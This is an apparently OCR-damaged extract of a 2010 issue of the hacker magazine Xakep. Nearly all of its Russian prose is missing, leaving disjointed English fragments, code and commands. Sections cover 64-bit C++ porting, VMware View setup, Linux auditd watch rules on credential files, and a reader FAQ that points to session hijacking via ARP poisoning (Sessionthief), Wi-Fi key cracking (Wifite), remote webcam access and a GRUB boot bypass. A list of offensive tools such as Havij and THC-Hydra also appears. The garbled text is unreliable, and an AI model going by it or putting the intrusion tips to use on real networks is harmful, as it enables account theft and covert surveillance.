- (void)touchesEnded:(NSSet*)touches
withEvent:(UIEvent*)event { [self
touchesMoved:touches withEvent:event]; }
- (void)touchesCancelled:(NSSet*)
touches withEvent:(UIEvent*)event { [self
touchesMoved:touches withEvent:event]; }

,
,
iPhone.

Tips & Tricks

,
, .
1. Default.png 320x480
.
splash-screen, ;
2. Icon.png 57x57
. Resources *.plist, , Icon file Icon.png.
;
3. Status bar is
initially hidden . .
. ! .z

113

CODING
deeonis deeonis@gmail.com

64-

. ,
. 2 . 64- ,
. , . , 32- .

, 64-.
64- IA64 Intel 64 ( AMD64/x86-64/
x64). Intel Hewlett
Packard Itanium Itanium
2. x86
.
x86-64 , IA64.
x64 64- ,
,
, 32- .
64 , Microsoft
Windows XP.
WoW64 (Windows-on-Windows 64),
32-
64- ,
64- , , x86.
Intel 64,

32- 64-.
x64 16
,
16 . ,
. , Windows 7 Home
Basic 8 , Windows 7 Ultimate
192 .
, 64-,
, x64 .

, Visual Studio 6.
CSampleApp, CWinApp.
WinHelp, . :

114

WinHelp
class CWinApp
{
virtual void WinHelp(DWORD dwData, UINT nCmd);
}
class CSampleApp: public CWinApp
{
virtual void WinHelp(DWORD dwData, UINT nCmd);
}

Visual Studio 2005,


WinHelp CWinApp .
DWORD_PTR,
DWORD.

class CWinApp
{
//
virtual void WinHelp(DWORD_PTR dwData, UINT nCmd);
}
class CSampleApp
{
virtual void WinHelp(DWORD dwData, UINT nCmd);
}

,
32-,
x64-,
WinHelp. , 64- DWORD
DWORD_PTR,
, , .
,
MFC, .
.
X 11 /142/ 10

64-

. , 32-
64- , , ,
size_t, . :

static void NumOfBits(const unsigned __int32 &)
{
printf(32- );
}
static void NumOfBits(const unsigned __int64 &)
{
printf(64- );
}

, x86-, , x64 .
. . , , .
, ,
. ,
32- , 64
.

class MyStack {
...
public:
void Push(__int32 &);
void Push(__int64 &);
void Pop(__int32 &);
void Pop(__int64 &);
}
MyStack stack;
// x64 8
ptrdiff_t value1;
stack.Push(value1);

// 4!!!
int value2;
stack.Pop(value2);

ptrdiff_t, int.
x86 , Intel
X 11 /142/ 10

PVS-Studio 64bit-
64 ptrdiff_t - int.
, ,
, .
,
.

32-
,
, .
x64-. ,
x86-, 64- .
, 64-
// 1
size_t ArraySize = N * 4;
intptr_t *Array = (intptr_t *)malloc(ArraySize);
// 2
size_t values[ARRAY_SIZE];
memset(values, 0, ARRAY_SIZE * 4);
// 3
size_t n, r;
n = n >> (32 - r);

,
, 4 .
32 , Intel 64
out of memory. size_t 4 ,
. , , , size_t.
,
sizeof()
<limits.h>, <inttypes.h> ..

// 1
size_t ArraySize = N * sizeof(intptr_t);
intptr_t *Array = (intptr_t *)malloc(ArraySize);
// 2

115

CODING

Microsoft Visual Studio 2010 64


size_t values[ARRAY_SIZE];
memset(values, 0, ARRAY_SIZE * sizeof(size_t));
// 3
size_t n, r;
n = n >> (CHAR_BIT * sizeof(n) - r);


64- const
size_t M = 0xFFFFFFF0u. 32- , , , ,
, , .
, x64 M
0x00000000FFFFFFF0u. ,
#ifdef, .
0xFFFFFFF0u
#ifdef _WIN64
#define CONST3264(a) (a##i64)
#else
#define CONST3264(a) (a)
#endif
const size_t M = ~CONST3264(0xFu);


-1. 0xFFFFFFFF. 64-
,
:

116


#define INVALID_RESULT (0xFFFFFFFFu)
size_t UserStrLen(const char *str)
{
if (str == NULL)
return INVALID_RESULT;
...
return n;
}
size_t len = UserStrLen(str);
// 64-

if (len == (size_t)(-1))
//

if 32- , x64
.
, INVALID_RESULT,
32-, 64- , :
#define INVALID_RESULT (size_t(-1)).

,
32- 64-. ,

, . z
X 11 /142/ 10

SYN/ACK
grinder grinder@tux.in.ua

VMware View 4.5:



,
.
. , ,
, , , ,
.
.

VMware View?

, .
:
, (),
. ,

, . , .

.
, .
.
, .
, , .
,
, . , , (SaaS, Software as a Service)
; Google: GMail, Google
Calendar, Google Docs .
?

, ,
.
. , ,
, ,
,
, .
( ),
.
?
.
(VDI, Virtual Desktop
Infrastructure). (Desktop as a Service,
DaaS), .

, ,
. , ,

118

. , , VDI
. ,
, .
: VDI MS Remote Desktop Services ( Win2k8R2
MS Terminal Services)?. , ,
. VDI TS/RDS ,
. , TS/RDS, , , . ,
, TS .
.
VDI
, , .
. ,
, View Client with Local Mode
VDI-.
VDI
, . , VDI
TS,
.

VMware View 4

VMware ,
VMware View (vmware.com/products/view), . View VMware VDI, , 3.0,
VMware View.
PCoIP (PC-over-IP),

, . HD-,
USB-, LAN WAN. ,
, ,
. ,
X 11 /142/ 10

PCoIP. PCoIP VMware View


( )
RDP HP RGS (Remote Graphics Software).
View VMware vSphere/
ESX ][. View . View
Manager ,
VM.
View Connection Server Security Server.
, , ,
( LDAP-)
. ( ). DMZ ,
, , WAN, .
VMware View Display,
. VMware View Direct
USB-. VMware View Printing,
. , ,
Unified Access (SSO)
. View Composer

. VMware ThinApp , ,
.
View Connection Server NLB- Windows.
View
Client, .
with localmode;
View Manager. View Manager, VM, , TS
.. View Agent. 32-
64- Windows, , Mac OS X.
VMware View
X 11 /142/ 10

Open Client (code.google.com/p/vmware-view-open-client), Windows-


VMware View, Linux Mac OS X. Open
Client LGPL v 2.1. - (View Portal).

- View Administrator, View PowerCLI
PowerShell vdmadmin.
4.5,
. ,
Win7, Mac OS X, , SCOM (System
Center Operations Manager), PowerShell .
.
, , VMware ROI
(Return on Investment) VMware View (roitco.vmware.com/vmw). VMware
View Enterprise Premier,
Bundle Add-On. , .
,
.

VMware View

VMware
, VMware View ( ). , .
Hardware Compatibility Guide
(vmware.com/resources/guides.html). ESX/ESXi,
.
VMware View VMware vSphere ESX/ESXi Server
vCenter ( ).
Active Directory, . View
OU,
GPO . IP-

119

SYN/ACK

View
Composer
DHCP DNS.
VMware View x86
Win2k3SP2 x86/x64 Win2k8R2,
.
2 CPU 2 RAM. ,
.
, View.
View Composter. .
,
( Win2k3 MS Framework 3.0). Database
Information , .
ODBS DSN Setup .
SQL- View
MS SQL Server 2k5/2k8, Express Edition ( 50 VM)
Oracle.
. Express Edition
Microsoft SQL
Server Management Studio Express (SSMSE),
MS. , Composer ( 8443).
View Connection Server. , ,
. IP-
. ,
.. Installation Options .
:
View Stardart Server
;
View Replica Server
; LDAP ;
View Security Server ;
DMZ LAN,
View , ;
View Transfer Server Local Mode.
,
Windows Firewall .
, Do not configure Windows
Firewall,
80, 443, 4001, 4100 8009 . , Install
. VCS
, .

120

View Connection Server

View Administrator

- View Administrator
.

https://server/admin. - IE
6/7 FF 3.0/3.5, Adobe Flash Player 10, . , -Win-
MS.
Domain Admins , .
,
.
View Administrator ,
,
.
. ,
( ),
. , : Dashboard, Users and Groups,
Inventory, , Policies View Configuration.
. ,
,
VA .
. View Configuration Product Licensing and Usage,
Edit License ,
VMware.
, ,
BUILTIN\Administrator. View
Configuration Administrators. Add User and Group,
.
.
, View,
.
View vCenter,
View Configuration Servers. Add
IP .
View Composer, Enable View Composer.
, Domains
Add, ,
, . ,
X 11 /142/ 10

INFO

info

View
Administrator

VMware vSphere

][
2010 .
VMware
View Citrix
XenDesktop, Systancia
AppliDis Fusion,
Ericom PowerTerm
WebConnect, Oracle
VDI.


, vCenter
View Administrator. Edit
:
SSL , URL ,
-, .
( , SSL,
)
View Configuration Global Setting.


vSphere,
. , VM,
VMware Tools. ,
View Agent,
. ,
.
, vCenter (,
VM, ). VD Inventory.
:
Automated Pool vCenter,
;
Manual Pool ,
, ,
vCenter;
X 11 /142/ 10

View Connection

Terminal Services Pool


Microsoft.
VM Pools,
Add .
, Pool ID. Setting
: , logoff, Adobe Flash. Connection Server; Connections
Server Restrictions, , ,
. ,
.
Desktops.

, VMware View
, .
. .
!z

121

SYN/ACK
, InfoWatch

, ,
. , ?
, , ,
....

. , ,
.
, ,
, . ,
. ,
(
,
). , , :
146 .

,
, 2007 146 (
) .
,
146-, . , , , .
, ,
, , , , ...
. . -
. ,
. ( , , ).
, . :
( 146-) , , , .

,
. ,
. ,

122

. . .
.
, .
;
.
, ,
, . , .
... ,
C, , , ,
,
. , , :
, .
,
, .
, . ,
, (, ,
).
, ,
. , ,
, , ,
. .
, ,
, .
, , , , , , .
.
, ;
, , .
(
) , , .
X 11 /142/ 10

, ,
( -
) . .
...

,
.
, , , ,
.
,
. ,
,
( ; )
,
.
.
, , , , ,
. , ,
.
. , , ,
, , ,
, ?
, :
?.
. .
. .
, , ,
.
.
X 11 /142/ 10

,
, , , , .
: , , ,
.
?
,
. . ,

. ,
play. record.
.
.

(, ).
, , .
. -.
, ,
- , ,
. -,
, . -,
, .
, . , ,
.
. ( , ).

123

SYN/ACK

C
3
C

1)
2
2)
3)




, , , ,
.

, ,
50 ( ) ?
, . , ,
, .
(
50 ),
. (omerta
, ,
. ).

.
.

. ,
. , DeFacto.
, .

? :
,
, , , . .
, ?

124

,

? , .
,
. ,
(
;
), :
!. , ,
, 146- -
. . (
) . .
,
: (
),
.

( )
.
.
, , .
, ,
, ,
. .
,
. ,
- . .
, .
X 11 /142/ 10

4000 . .

XVII . .

. 35

. 1 . 44


, ;
, , , ,

()

;
, , ()
( XX )


, :
,
.
, , .
, /
. ,
( ). []
.

( ).
/
. .
.
, ,
.
, ,
:
, . (. 2
. 42 ) .

.
: , , . ,
; ,
,
. , .
.
, ,
: , ,
? .
,
.
( , ,
), , , .
. ,
X 11 /142/ 10

. ,
(
, ), .
. , ,
, . , . ,
:
. . .

.

( )?


, . , , ,
.
, .
, ,
. ,

. ? , ,
. ,
,
, .

.
, ,
(, ). . ,
.

. , .

,
. ,
146- .
. , ,
. , .
! z

125

SYN/ACK
zobnin@gmail.com

DVD


auditd,


Debian/Ubuntu.


Linux

- Linux-
.
, .
-,
.
,
, - ( ).
,
, .
, / ,
, ,
, . Linux,
,
,
- .

2.6

2.6, Linux , .
, :
(, );
/ ;
;
;
;
;
.
,
.
, , ,
, .
,
auditd.

auditd Linux-
.
, auditd Debian/Ubuntu, :
$ sudo apt-get install auditd

, ,
:

126

auditctl , .
,
;
autrace , ( strace);
ausearch ,
;
aureport , ;
( , sudo auditctl -l).
- , . ,
, ,
Linux.


. , , ,
, ,
,
. ,
, . , , .
.
, , . , ,
,
auditd ,
.
, auditd.
,
(

).
, ,
, , ..
,
X 11 /142/ 10


(, , ,
). , - ,
,
.

,
auditctl. ,
:
-a ;
-d ;
-D ;
-l .
auditctl -l , , , No rules, ,
. auditctl:
# auditctl -a , -S __
-F

, . :
task , ;
entry , ;
exit ,
;
user , , uid, pid gid;
exclude .
, . ,
,
. entry exit,

, .
'-a' , . : never always.
,
.
'-S', ,
(,
open, close, exit, ..). .
X 11 /142/ 10

'-F'
. ,
,
open(), /etc, :
# auditctl -a exit,always -S open -F path=/etc/

, , ,
:
# auditctl -a exit,always -S open -F path=/etc/ -F perm=aw

'a' ( attribute change), 'w'


( write). 'r' (read) 'x'
(execute). :
pid , , apid ,
, success ,
, a1, a2, a3, a4
. key
,
, . ,
man- auditctl.
, auditctl , '-S' . ,

( '-p' perm):
# auditctl -a exit,always -F dir=/etc/ -F perm=wa

( '-p' perm, '-k' key):


# auditctl -w /etc/ -p wa -k access_etc

:
# auditctl -w /etc/passwd -p wa

, .
auditd : /etc/audit/auditd.

127

SYN/ACK

auditd.conf

audit.rules

audictl
audispd
aureport
auditd
audt.log

application

autrance

ausearch

audit
kernel


conf /etc/audit/audit.rules (
/etc).
, , , . ,
.
auditctl, ,
, ,
. :

, Steve Grubb

-w /var/log/audit/
-w /var/log/audit/audit.log


.
,
. , Debian/Ubuntu!

-w /etc/passwd -p wa

-, :
#
-D
# ,
-b 8192
# (,
)
# 0
# 1 dmesg
# 2 (kernel panic)
-f 1

,
- .
, , .
# vi /etc/audit/audit.rules
#
-w /etc/audit/auditd.conf -p wa
-w /etc/audit/audit.rules -p wa
-w /etc/libaudit.conf -p wa
-w /etc/default/auditd -p wa
#

128

# vi /etc/audit/audit.rules
# at
-w /var/spool/at
-w /etc/at.allow
-w /etc/at.deny
# cron
-w /etc/cron.allow -p wa
-w /etc/cron.deny -p wa
-w /etc/cron.d/ -p wa
-w /etc/cron.daily/ -p wa
-w /etc/cron.hourly/ -p wa
-w /etc/cron.monthly/ -p wa
-w /etc/cron.weekly/ -p wa
-w /etc/crontab -p wa
-w /var/spool/cron/root
#
-w /etc/group -p wa
-w /etc/passwd -p wa
-w /etc/shadow
#
-w /etc/login.defs -p wa
-w /etc/securetty
-w /var/log/faillog
-w /var/log/lastlog
#
-w /etc/hosts -p wa
#
-w /etc/init.d/
-w /etc/init.d/auditd -p wa
X 11 /142/ 10

HTTP://WWW
links

aureport
#
-w /etc/ld.so.conf.d
-w /etc/ld.so.conf -p wa
#
-w /etc/localtime -p wa
#
-w /etc/sysctl.conf -p wa
#
-w /etc/modprobe.d/
# PAM
-w /etc/pam.d/
# SSH
-w /etc/ssh/sshd_config


,
. ,

,


.
# vi /etc/audit/audit.rules
#
-a entry,always -S chmod -S fchmod -S chown
-S chown32 -S fchown -S fchown32 -S lchown -S
lchown32
# ,

-a entry,always -S creat -S open -S truncate


-S truncate64 -S ftruncate -S ftruncate64
#
-a entry,always -S mkdir -S rmdir
#
-a entry,always -S unlink -S rename -S link
-S symlink
#
-a entry,always -S setxattr
X 11 /142/ 10

aureport -f grep
-a
-a
-a
-a
-a

entry,always
entry,always
entry,always
entry,always
entry,always

-S
-S
-S
-S
-S

lsetxattr
fsetxattr
removexattr
lremovexattr
fremovexattr

#
-a entry,always -S mknod
#
-a entry,always -S mount -S umount -S umount2
# ptrace

-a entry,always -S ptrace

, auditd
/var/log/audit,
, ,
.
aureport, -.
, , ,
,
, .. ,
. , '-f', ,
:

Steve Grubb
Red Hat

:
http://people.
redhat.com/sgrubb/
audit/visualize/
mkgraph
http://people.
redhat.com/sgrubb/
audit/visualize/mkbar

WARNING
warning
,

auditd,
,


/etc/init.d/auditd
restart.

$ sudo aureport -f

,

(
'--end' ):
$ sudo aureport -f --start 08/20/10 12:00
--end 08/20/10 13:00

: now
(), recent ( ), today (
), yesterday ( ), this-week
(), this-month () this-year ().

129

SYN/ACK

auserch -
:
$ sudo ausearch -ui 2010

:
$ sudo ausearch -x /usr/bin/nmap

:
$ sudo ausearch -tm pts/0

aureport --f --summary ,



, ( ):

:
$ sudo ausearch -tm cron

:
1. ;
2. ;
3. ;
4. ;
5. ( ,
'-i');
6. (yes no);
7. , ;
8. Audit UID (AUID). ;
9. .
,
'--summary', aureport
,
:
$ sudo aureport -f -i --start recent --summary

,
(
), .
// ,
aureport, ,
:
$ sudo aureport -f -i --start today | grep /etc/passwd

,
ausearch:
$ sudo auserch -a _

ausearch
:
$ sudo ausearch -sc ptrace -i

130

$ sudo auserch -k etc_access

ausearch , , aureport. aureport


,
, , , ( '-s'),
( '-au') , (
'-l'), ( '-m') (
man-).
, ( '--failed').

AUID PAM

su sudo
(UID), -
.
Audit UID
(AUID),

UID su sudo. ,
AUID (
aureport -1), , ,
PAM.
/etc/pam.d/login session required pam_loginuid.
so session include common-session. /etc/pam.d/sshd, /etc/
pam.d/gdm (kdm, KDE), /etc/pam.d/
crond /etc/pam.d/atd.

Linux, . , , ,
. z
X 11 /142/ 10

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:

100% o a ao. a
ooa oa aooa a
a, aa a, a oo . a
ooo aa , o a aa,
oo . !
! ! !
, .
?
:

1973
-,

; , ,
-
.
,
,
,
, ,
,
,

. , ,

, :
, -
, ,
H. , -,
. ,
- .

132

,
,
.

,
, ,
,
. , ,
, . ,

, ,
, .

--- ,

, ,
:

1.
;
2.
;
3. , .
,
,
,

.
, , , (
, ,
- ?).
, ,


. ,
,
X 11 /142/ 10

,
. ,
,
.

1.
.
,
.
, ,
,
. ,
,
, ;
,
, ,
,
,

, .
,
, ,
, , ;
X 11 /142/ 10

, -
.
,
, ,
, , ,

,
.
2.
,
.
, ,
:

?
.
, : 10
, ; , .
, , . ,
. : , , ,
( , :)).
, (. -
)
,
, - ,
.

133

UNITS


1986 - , .
,
.
: , , , , .
, , ,
. , , ( , ) .

, ?

!

134

;
,
(!!!) ;
,

,
.
( , ,
), . , ,
,
, .
3. ,
.
.
, ,
: , , -,
-,
,

, - . ,


, , .
:
,
(, ,
,
,
..) ( , X 11 /142/ 10

,
!

)? , ,
, .
:
,
(.
). . ,

Corsair
H70, 50.
? , .
.
,

.
: ,
( ),

,

.
: , ,
, , echo print
( ,

):)? , ,
, ,
, . , ,
X 11 /142/ 10

- , .
:

, ,
,
.
,
. ,
( ),

, .
: , ,

,
, .
: ,
-, ,
,
( ,
). :
,
?
.
-, , , ,
,
; -,
,
, ,

.

(
):
,
.
? .
,
.

, . .
.
:
!
!
:
:
,
! ! , , ?
.

,
:
!
!
:
,

.

135

UNITS

,
? ,
,
, , . , ,
: , ,

(), , ,
,
.
.

, ,
, .

;
.

, , , ?
-
. ,
, :).

aka

: , ,
, ,
?
, : --!. ,
: . ,
: , .
,
, ,

,
. ,

136

. ,
,
, ,
, -
,
.
, . , ,
, ,
,
:
- ?,

: ? , !
! ,
, ,
,
. :
,
.
, : ( ) + ( ) = .
, , : -
( ) = ( ).
,
(
). ,
,
- ,
.
,
. ,

,
.


. , ,

;

,

,
( ). -
, , - .
,
,

, .
,
, , ,
, .
, , , ,

.
: ,
-

, ,
,
.
-
- (
),
, , ,
.



,
, , ,
.
,

,
X 11 /142/ 10

, Left4Dead
.

,
,


, , ,
.
, ,
,
.
, ,
- ( ).
,
,
. ,
,
, ;
-
3-4 , ,
.
,
,
.
:
, , , ; .

70-80% ( ,
,
,
), .
X 11 /142/ 10

, , , ,
.
. ,
- ,
,
. ,

, ,

,
.
, ,

.
1. ,
,
. ,
,
,
, .
, ,
.
( )
. ,
- (,
, ):
, , ( ) -

,
. ,
, , -,

2.
,
,
: , , ,
.

,

(
).
3.
:
, . ,
90% ,
, 2-3 ,
, . , ,

, .
,
MLM ( ).
, ,
, ,
. z

137

UNITS

faq
united?
,
faq@real.xakep.ru

Q: , . .
-
, ? ?
A: /

com/p/torsocks).
:

USB- USB Flash Benchmark,


usbflashspeed.com. ,
.
,
Top 10 of the fastest Flash Drives
. ,
, Silicon Power LuxMini
920, 1000 .


, Torsocks,
DNS- . , , ,
.

Q:
Tor?
A:
Socks,
Torsocks (code.google.

138

apt-get install torsocks


usewithtor ssh username@ssh.com

torsocks pidgin

Q: ,
Malware?
A: Windows- OllyDbg,
IDA Pro
, , ,
.
REMnux (zeltser.
com/remnux),

. ,
Ubuntu, PDF- Flash-,
,
JS-,
, .
REMnux LiveCD VMware,
VMware Player.

Q: ,
802.11n, .
, Wi-Fi
Atheros,
. ?
A: , Wi-Fi-
Atheros AR9xxx. .

802.11n ,

. .
EEPROM,
, X 11 /142/ 10

Logitech Touch Mouse


iPhone/
iPad


. rghost.ru/2603267.
, ,
Windows Vista/7 x64
;
<F8>
.
:
1.
atheros_eeprom_tool.exe;
2. Read EEPROM EEPROM,
READ.
3. , ,

EEPROM. Write
EEPROM
.
4. Modes and
Channels .
5. Modes 802.11n (20MHz) 802.11n
(40MHz) 2.4GHz. 5GHz. Channels
0x67 OK.
13. ,
Use custom modes and channels, WRITE.
14. , .
(rghost.
ru/2501075).

. Windows7 x64,

.
Driver Signature Enforcement Overrider (www.
ngohq.com/home.php?page=dseo).

Q: - 802.11n ,
.
A:
Wi-Fi. 802.11n WPA2-PSK+AES X 11 /142/ 10

,
.
40MHz
1 9.

Q: , Windows Linux ( GRUB).



, (
) , .
A: ,
,
, .
-
. GRUB
.
:
;
Linux;
.
: GRUB2
e, GRUB Legacy
e, ;
, linux
kernel, quiet
splash ( ),
single init=/bin/bash;
( GRUB2,
Ctrl+X, GRUB Legacy Esc,
b).

.

Q: .
, .
A: ( )
, .
OllyDbg :
, -

,
Breakpoint Memory, on access.
Windbg,
ba.
: [ba r/w/e size adr],
r/w/e ( ,
), size , adr .

Q:
Visual Studio?
A: , . :
1. File Open Project/
Solution
(, c:\Windows\System32\calc.exe);
2.
Debug
command line.

Q:
.
,
.
A: -,
HTTP-,
.
,
Sessionthief (scriptjunkie1.
wordpress.com/2010/07/17/sessionthief).
,
, ARP poison ,
HTTP-. ,

Sessionthief
Firefox
.

139

UNITS

, ,
,
, . ,



.

CMOS
Q: ,

.
.
A:
,
(DoIt, AutoIT ..).

, Mimer.

, ,
, .

Q:
.

. ,

WEP- SSID,
. , , ,
?
A:
, -
. . :)
Backtrack4 R1 Wifite,

WEP WPA .
(
, WEP,
..) GUI- .
, Wifite
WPA handshake'.

Q:
-
?
A: ,
-
.
RemCam 2
(redsh.ru),
/.
(
)
install.cmd,
, ( ),

140

Q: x-,
(
)
HTTP- .
?
A:
Fiddler. , HTTP(S)-

. ,

. ,

FiddlerCore (fiddler.wikidot.
com/fiddlercore),
.NET-.

API.

Q:
Windows, (
)?
A: CMOS De-Animator
(www.st-ware.com), CMOS, ,
,
. , Clear CMOS
, .

Q:
?
A: , .
Darik's Boot and Nuke (www.
dban.org). LiveCD,

. DBAN
, .
,

, :
,
.

Q: iPod , iTunes,
. ,
?
A: , iTunes ,
,

Apple .
, : CopyTrans
Manager (www.copytrans.net), Foobar2000
(www.foobar2000.org), MediaMonkey (www.
mediamonkey.com), Songbird (getsongbird.com).

Q: ,
?
A:
date | md5sum. , date md5sum
. ,
Cygwin (www.cygwin.com).

Q: -
.
Wi-Fi
.
A:
Logitech,

Logitech Touch Mouse (www.logitech.com).
-. Touch Mouse Server
(
Mac OS X), iPhone iPod Touch
Touch Mouse.
,
IP ,

.
, ,
. ,
Touch Mouse
, , ,
Android?

Q:

. ? ?
A: , ,
, , . ,
,
,
.
,
,
.
.
,
PayPal.

. -, ,
. ,
,
. z
X 11 /142/ 10

>Net
Feed Demon 3.5.0.11 Beta
FireFTP 1.0.9
Google Chrome 7.0.536.2 Beta

>Multimedia
Alcohol 120% 2.0.1.2033
Blender 2.54 Beta
Evernote 3.5.6
FastStone Image Viewer 4.2
IrfanView 4.27
SPlayer 3.5
TagScanner 5.1.592
Portable-
Zoner Photo Studio Free 1.2
ZumoCast 1.1

>Misc
Appetizer 1.4
ArsClip 3.1.4
EasyDuplicateFinder
Eraser 6.0.7
Everything 1.2.1
FileLocator Lite 2010
FileToFolder 2.0
LastPass 1.70.1
LockHunter
PrtScr
PStart 2.11
Rainlendar 2.8
SecondShell 2.0.1
Tahometer Agent 1.0.8.2
Transmiti
VirtuaWin 4.3
WinDirStat 1.1.2
Windows 7 Taskbar Items Pinner
WRITEMONKEY 0.9

>Development
dirtyJOE 1.1
EMS SQL Manager for PostgreSQL
4.7
Inno Setup 5.3.11
PostgreSQL 9.0.0
TortoiseSVN 1.6.11

>Devel
Acovea 5.0

>>UNIX
>Desktop
2ManDVD 1.4.0
3ddesktop 0.2.9
Anki 1.0.1
Clementine 0.5.3
Eaglemode 0.79.0
Enlightenment 1.0.6
Fbpanel 6.1
Foobnix 0.2.1
FreeMat 4.0
Hawkscope 0.6.2
QLandkarte GT 0.19.2
raw2jpeg 0.1
Shutter 0.86.4
Thunar 1.1.0
Tulip 3.4.1
VLC 1.1.4.1
Win2-7 Pack 5.9.1
Xt7-Player 0.9.244

>System
Cameyo 1.5
ClamWin Free Antivirus 0.96.2.1
CleanMem 1.5.1
Comodo System Cleaner 2.2
Defraggler 1.21
Sandra 2010 SP2 v16.67 (freeware)
System Ninja 1.5
TimeComX 1.2.4.10
Toucan 3.0.3
Update Checker v1.038
WinPatrol 19.0.2010.0
xplorer2 lite v1.8

>Security
Burp Suite 1.3
CMOS De-Animator v2
DAVTest 1.0
Dojo 1.0
evercookie 0.3b
FindDomains 0.1.1
Hamster Sidejacking Tool 2.0.0
Havij v1.12 Free
HotFuzz
Knock 1.4.2 beta
Ncrack 0.3a
Netsparker Community Edition
OWASP Code Crawler 2.7
RIPS 0.35
Sessionthief
Simple Malware Check Tool 1.2
StreamArmor v1
THC-Hydra 5.8
TrueCrypt 7.0a
TSK 3.2.0b1 beta

Http File Server 2.2f


inSSIDer 2
TweetMyPC 3.5
WinSCP 4.2.9
XeroBank 3.9.10

>Server
389 Directory Server 1.2.6.1
3proxy 0.6.1
6tunnel 0.11

>Security
aafid2 0.10
ADMsmb 0.3
ADMsnmp 0.1
Aescrypt 0.7
AIM Sniff 1.0b
Bed 0.5
BlueBugger 0.1
Cupp 3.1
ferm 2.0.7
HotSpotter 0.4
ICMPchat 0.7
Kismet 2010-07 R1
Mixminion 0.0.8a
saltymd5 0.2
Sessionthief
SIPcrack 0.4
Wifite
Wireshark 1.4

>Net
Aget 0.4.1
Apinger 0.6.1
Crossroads Load Balancer 2.68
Evolution 2.32.0
Evolution Exchange 2.32.0
Gajim 0.14
Google Chrome 6.0.472.63
Hotot 0.9.4
InspIRCd 2.0.2
MapProxy 0.8.5
Minbif 1.0.4
Mozilla Firefox 3.6.10
NiX 1.4.0
Opera 10.62
ProxyChains 3.1
Steadyflow 0.1
Subdownloader 2.0.13
uTorrent alpha 3.0

>Games
Steel Storm Episode I

Ald 0.1.7
Autoconf 2.68
Cairo 1.10.0
Clutter 1.4.0
fabulous 0.1.5
GDB 7.2
gjrand 3.3.3
Gmail4J 0.3
Jad 1.5.8e
KDevelop 4.0.2
libgee 0.6.0
libpng 1.4.4
ORBit2 .2.14
Qt 4.7
SPE 0.8.4
Swftools 0.9.1
Zend Optimizer 3.3.9

>>MAC
7zX 1.7.1
Adium 1.3.10
Battery Health Monitor 1.5
Black Hole 1.2
Carbon Copy Cloner 3.3.4
CleanMyMac 1.9.3
Hawkscope 0.6.3
MacPorts 1.9.1
Mozilla Firefox 3.6.10
muCommander 0.8.5
OnyX 2.1.8
Opera 10.62
Seashore 0.5.1
SnapNDrag 2.5.7
StuffItExpander 2011
Tor 0.2.1.26
Transmission 2.04
VLC 1.1.3

>System
Ajenti
bzip2 1.0.6
Deja Dup 16.0
Drive I/O System Monitor Plasmoid
0.1
Gnome System Monitor 2.28.2
intltool 0.41.1
ATI Catalyst 10.9
Linux Kernel 2.6.35.7
Lzip 1.11
Monit 5.2
PlayOnLinux 3.8.3
R.I.P. 10.9
Spice 0.6
UNetbootin 490
xf86-video-intel 2.13.0

Apache 2.2.16
bftpd 3.1
BIND 9.7.2-P2
CUPS 1.4.4
Darwin Streaming Server 6.0.3
DHCP 4.1.1
MySQL 5.5
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
PostgreSQL 9.0
Samba 3.5.5
Squid 3.1.8
twoftpd 1.41
UnrealIRCd 3.2.8.1

/
142

11(142) 2010

>>WINDOWS
>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.6.1233
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.4.1
foobar2000 1.1
K-Lite Codec Pack 6.4.0
Miranda IM 0.9.4
Mozilla Firefox 3.6.10
Notepad++ 5.8.1
Opera 10.62
PuTTY 0.60
Skype Last
Sysinternals Suite (september)
Total Commander 7.55
Unlocker 1.9.0
XnView 1.97.8
x 11 () 2010

ZEUS
METERPRETER
CHAOS CONSTRUCTIONS 2010:


. 26

HTML5?

11 (142) 2010



: 2
10
.

. 64



TCL

. 50

CISCO

!
800 !

8.5
DVD

191

2200 .
23%
( )

(250 )

30 ,
31 ,
31 .


+ DVD

DVD
+ DVD

Total Football
+ DVD

DVDXpert

+ DVD

Smoke

PC : DEAD SPACE 2

10

: 250

#10(82) 2010

DEAD
SPACE 2

. 36

BIOSHOCK INFINITE

+ DVD

. 90

. 44

DRAGON AGE 2

, RPG

MAFIA 2

PC
+ 2 DVD

Mountain Bike

Digital Photo
+ DVD

+ DVD

T3

Onboard

Ski Pass

! !
. 50

.
: 210

11 (142) 2010

HTML5?
. 26

ZEUS
METERPRETER
CHAOS CONSTRUCTIONS 2010:


CISCO



TCL
. 64


+ + 2 DVD: - 162
( 35% , )
+

12 3890 (24 )
6 2205 (12 )

,
.

,

, :

!
1. ,
,
http://shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
(495) 780-88-24;
119021, , . ,
. 11, . 44, , .

72 000 QIWI
() .

!
.
,
. , ,
.
, .
( )


. .

6 c 1260 ( ).
6
R-kiosk , . , .27-31 648 .
,
.

(495)780-88-29 ( ) 8-800-200-3-999 ( ,
, ). , /
INFO@GLC.RU WWW.GLC.RU .

UNITS

HTTP://WWW2

TOPCODER
www.topcoder.com
?
, ? ?
- .
TopCoder. Java, C++ C#,
$25 $300. ,

TopCoder Open. ,
Google Code Jam.

TAHOMETER
www.tahometer.com

, .
: ?.


.
tahometer, , . ,
. tahometer , .

DNS-

IPQ.CO
www.ipq.co
bit.ly tiny.cc,
URL- (,
http://bit.ly/9OtU7h). , ipq.co ,
, IP-. , DNS-,
.
IP, hostname
n4c10h.ipq.co, . , . ipq.
co , ,
- .

144

SPOTTHEVULN
www.spotthevuln.com

,
, . SpotTheVuln
.
? , , SQL Injections
.
(, WordPress) SpotTheVuln
,
. , .
X 11 /142/ 10